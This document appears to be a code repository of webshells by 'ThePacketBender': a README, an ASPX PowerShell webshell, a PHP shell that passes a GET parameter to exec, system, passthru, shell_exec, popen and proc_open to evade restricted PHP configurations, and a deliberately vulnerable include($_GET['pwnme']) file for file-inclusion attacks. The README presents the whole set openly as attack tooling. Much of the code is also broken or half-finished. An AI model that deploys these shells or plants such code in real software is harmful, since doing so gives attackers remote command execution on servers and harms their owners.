├── POWERshell.aspx ├── RCEfinder.php ├── README.md └── rfi2lfi.php /POWERshell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.Collections.ObjectModel"%> 3 | <%@ Import Namespace="System.Management.Automation"%> 4 | <%@ Import Namespace="System.Management.Automation.Runspaces"%> 5 | <%@ Assembly Name="System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31BF3856AD364E35"%> 6 | 7 | 8 | 9 | 47 | 48 | 49 | 50 | POWER!shelled 51 | 52 | 53 |
54 | Index 55 | POWER!webshell>
56 | 59 |
60 | 62 |
63 | 64 | 65 | -------------------------------------------------------------------------------- /RCEfinder.php: -------------------------------------------------------------------------------- 1 | '; 4 | echo ''; 5 | echo ''; 6 | echo ''; 7 | 8 | //heading 9 | echo '
'; 10 | echo '

ThePacketBender PHP Webshell

'; 11 | echo '

testing php command execution

'; 12 | echo '
'. php_uname(); 13 | echo '
'; 14 | 15 | 16 | //inputs(GET) 17 | $iget = <<<'IGET' 18 |
19 |
20 |
21 |
22 |
43 | run as process? 44 | 45 |
46 |
47 |
'; 48 | 49 | echo $iget; 50 | ugot($optvals); 51 | echo $igot; 52 | 53 | 54 | //print status 55 | foreach ($pro as $x) { 56 | $x.dispProc(); 57 | } 58 | 59 | 60 | //classes for custom rce stdio 61 | class Process{ 62 | private $pid; 63 | private $cmd; 64 | 65 | //execute command to ignore signals 66 | private function runCmd(){ 67 | if (substr(php_uname(), 0, 7) == "Windows"){ 68 | $cmd = 'START /B /min '.$this->cmd; 69 | } 70 | else{ 71 | $cmd = 'nohup '.$this->cmd.' 2>/dev/null 2>&1 & echo $!'; 72 | //exec($cmd, $output, $rl); 73 | $this->pid = (int)$op[0]; 74 | } 75 | } 76 | //set process ID 77 | public function sPid($pid){ 78 | $this->pid = $pid; 79 | } 80 | //get process ID 81 | public function gPid(){ 82 | return $this->pid; 83 | } 84 | //check status if command execution is non-blind 85 | public function ps(){ 86 | //define command command for given OS 87 | if (substr(php_uname(), 0, 7) == "Windows"){ 88 | $this->cmd = 'tasklist | FINDSTR '.$this->pid; 89 | } 90 | else { 91 | $this->cmd = 'ps -aux | grep '.$this->pid; 92 | } 93 | //exec($command,$op); 94 | if (!isset($op[1]))return false; 95 | else return true; 96 | } 97 | public function start(){ 98 | if ($this->cmd . $this->cmd != ''){ 99 | $this->runCom(); 100 | } 101 | else{ 102 | return true; 103 | } 104 | } 105 | public function stop(){ 106 | gPid(); 107 | $this->cmd = 'kill '. $this->pid; 108 | //exec($command,$op); 109 | if ($this->status() == false){ 110 | return true; 111 | } 112 | else { 113 | return false; 114 | } 115 | } 116 | public function dispProc(){ 117 | echo $this->pid .' '. $this->cmd .''; 118 | } 119 | } 120 | 121 | 122 | //functions for custom rce stdio 123 | function execBackground($cmd) { 124 | if (substr(php_uname(), 0, 7) == "Windows"){ 125 | pclose(popen("start /B ". $cmd, "r")); 126 | } 127 | else { 128 | exec($cmd . 
" > /dev/null &"); 129 | } 130 | } 131 | $i = 0; 132 | $pro = array(); 133 | function proc($cmd) { 134 | $i++; 135 | $i = new Process(); 136 | $i->cmd = $cmd; 137 | $i.start(); 138 | $pro[] = &$i; 139 | 140 | return $cmd; 141 | } 142 | 143 | //standard output 144 | function stdout($cmd) { 145 | //check for value 146 | if ($_GET["cmd"] != NULL){ 147 | $cmd = $_GET["cmd"]; 148 | } 149 | //instantiate as Process if true 150 | if ($_GET["isProcess"] == True){ 151 | //DO WORK HERE 152 | //THIS IS WHERE class object returns code for jobbing 153 | //e.g. cmd = ProcessName->cmd . $_GET($cmd); 154 | $prefix = proc($cmd); 155 | $prefix .= $cmd; 156 | $cmd = prefix; 157 | } 158 | echo '

'; 159 | switch ($_GET["function"]) { 160 | case backticks: 161 | echo `$cmd`; 162 | case exe: 163 | exec($cmd,$output,$rv); 164 | print "return value " . $rv; 165 | print "----------------------"; 166 | print "--------output--------"; 167 | print "----------------------"; 168 | echo '
'; 169 | print $output; 170 | //made redundant? 171 | case exebg: 172 | execBackground($cmd); 173 | case pcntlexe: 174 | $args = preg_split('/ /', $_GET[cmd], 1, PREG_SPLIT_OFFSET_CAPTURE); 175 | echo pcntl_exec($cmd[0],$args); 176 | case popn: 177 | $rets = popen($cmd, 'r'); 178 | $read = fread($rets, 4096); 179 | echo $read; 180 | case procopen: 181 | $descriptor = array( 182 | 0 => array("pipe", "r"), //stdin 183 | 1 => array("pipe", "w"), //stdout 184 | 2 => array("file", "/dev/null", "a") //stderr 185 | ); 186 | echo proc_open($cmd, $descriptor); 187 | case pthru: 188 | $rets = ""; 189 | passthru($cmd, $rets); 190 | print $rets; 191 | case sexec: 192 | echo shell_exec($_GET["cmd"]); 193 | case sys: 194 | $rets = ""; 195 | system($cmd, $rets); 196 | print $rets; 197 | default: 198 | 199 | 200 | } 201 | echo '
'; 202 | } 203 | print(stdout()); 204 | echo '
'; 205 | if ($_GET[$pinfo]=pinfo) { 206 | echo phpinfo(); 207 | } 208 | echo ''; 209 | echo ''; 210 | 211 | ?> 212 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WEBSHELLS 2 | 3 | Webshells I have written: 4 | ------------------------- 5 | _________________________ 6 | POWERshell.aspx 7 | -basic powershell RFI webshell, some code taken from sources then trimmed, pruned, reconfigured and parts reconnected to alter execution flow in client browser 8 | RCEfinder.php 9 | -Webshell for fuzzing system command execution using builtin and custom php functions to bypass limiting php configurations with optional job control 10 | -implemented in code, will be added to UI- for debugging code execution errors 11 | RFI2LFI.php 12 | -Local file inclusion vulnerable php file implementing known attack methods to fuzz for arbitrary code execution where RCE command execution methods have failed -------------------------------------------------------------------------------- /rfi2lfi.php: -------------------------------------------------------------------------------- 1 | '; 4 | echo ''; 5 | echo ''; 6 | echo ''; 7 | 8 | //heading 9 | echo '
'; 10 | echo '

ThePacketBender PHP Webshell

'; 11 | echo '

for exploiting LFI for shell over RFI

'; 12 | echo '
'. php_uname(); 13 | echo '
'; 14 | 15 | 16 | //inputs(GET) 17 | $iget = <<<'IGET' 18 |
19 |
20 |
21 |
22 |
42 | 43 |
44 |
45 |
'; 46 | 47 | echo $iget; 48 | ugot($optvals); 49 | echo $igot; 50 | 51 | 52 | //function 53 | function geturl($url, $referer) { 54 | $headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,text/html,application/xhtml+xml'; 55 | $headers[] = 'Connection: Keep-Alive'; 56 | $headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; 57 | $useragent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)'; 58 | 59 | $process = curl_init($url); 60 | curl_setopt($process, CURLOPT_HTTPHEADER, $headers); 61 | curl_setopt($process, CURLOPT_HEADER, 0); 62 | curl_setopt($process, CURLOPT_USERAGENT, $useragent); 63 | curl_setopt($process, CURLOPT_REFERER, $referer); 64 | curl_setopt($process, CURLOPT_TIMEOUT, 30); 65 | curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); 66 | curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); 67 | 68 | $ret = curl_exec($process); 69 | curl_close($process); 70 | 71 | return $ret; 72 | } 73 | 74 | 75 | //standard output 76 | echo '
'; 77 | function stdout($cmd) { 78 | //check for value 79 | if ($_GET["cmd"] != NULL){ 80 | $cmd = $_GET["cmd"]; 81 | echo ''; 82 | } 83 | echo '

'; 84 | switch ($_GET["function"]) { 85 | case "environ": 86 | echo ''; 87 | case "fd": 88 | echo ''; 89 | echo ''; 90 | $fd = array("cmdline","stat","status"); 91 | for($x=0;$x=33;$x++){ 92 | array_push($fd, $x); 93 | } 94 | $link = 'http://'. $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; 95 | foreach($fd as $fil){ 96 | echo ''; 97 | echo geturl($link, $link); 98 | } 99 | case "data": 100 | //stop onload and close GET form 101 | echo ''; 102 | echo ''; 103 | echo ''; 104 | 105 | //POST request form 106 | echo '
'; 107 | echo ''; 108 | echo '
'; 109 | 110 | //XMLHttpRequest hack to asynchronously submit GET data:// and POST $cmd 111 | echo 'var f = document.forms.rfi; 112 | var pDat = []; 113 | for (var i = 0; i < f.elements.length; i++) { 114 | pDat.push(f.elements[i].name + "=" + f.elements[i].value); 115 | } 116 | var xhr = new XMLHttpRequest(); 117 | xhr.open("POST", "'. $_SERVER['PHP_SELF'] .'", true); 118 | xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 119 | xhr.send(postData.join("&")); 120 | document.forms.lfi.submit();'; 121 | case "expect": 122 | echo ''; 123 | case "input": 124 | //stop onload and close GET form 125 | echo ''; 126 | echo ''; 127 | echo ''; 128 | 129 | //POST request form 130 | echo '
'; 131 | echo ''; 132 | echo '
'; 133 | 134 | //XMLHttpRequest hack to asynchronously submit GET data:// and POST $cmd 135 | echo 'var f = document.forms.rfi; 136 | var pDat = []; 137 | for (var i = 0; i < f.elements.length; i++) { 138 | pDat.push(f.elements[i].name + "=" + f.elements[i].value); 139 | } 140 | var xhr = new XMLHttpRequest(); 141 | xhr.open("POST", "'. $_SERVER['PHP_SELF'] .'", true); 142 | xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 143 | xhr.send(postData.join("&")); 144 | document.forms.lfi.submit();'; 145 | 146 | case "filter": 147 | echo ''; 148 | case "log": 149 | 150 | case "phpinfo": 151 | phpinfo(); 152 | default: 153 | echo 'NO LFI $_GET[] ?PARAMETER=PASSED, ergo FUNCTION include() returned NULL'; 154 | } 155 | } 156 | echo ''; 157 | print(include($_GET['pwnme'])); 158 | #print(stdout()); 159 | echo '
'; 160 | echo ''; 161 | echo ''; 162 | 163 | ?> 164 | --------------------------------------------------------------------------------